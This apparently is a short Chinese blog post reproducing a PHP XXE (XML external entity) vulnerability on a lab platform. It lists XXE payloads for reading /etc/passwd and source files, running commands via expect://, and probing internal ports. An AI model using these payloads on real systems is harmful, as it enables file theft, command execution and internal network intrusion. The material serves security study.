[PHP]XXE 漏洞复现

PHP-XXE :PHP xml 外部实体注入漏洞(XXE)

复现地址:buuoj.cn  //自己搭建也行

XXE的特征

使用了LodXML( )函数。

危害:

3.1读取任意文件

file 协议,file:///etc//passwd
php 协议,php://filter/read=convert.base64-encode/resource=index.php

3.2执行系统命令

部分情况会有,在特殊的配置环境下,如PHP环境中PHP的expect模块被加载到了易受攻击的系统或者能处理XML的应用中,就能执行命令。简单payload如下

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://ifconfig" >]>
<root>
<name>&xxe;</name>
</root>

3.3探测内网端口

借助漏洞实现内网探测,常见payload如下:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "http://192.168.199.100:80">]>
<root>
<name>&xxe;</name>
</root>
复制代码

3.4攻击内网网站(dos或者直接吃服务器资源导致无法正常服务)

参考链接:https://www.cnblogs.com/Rightsec/p/10263454.html

发表评论

邮箱地址不会被公开。 必填项已用*标注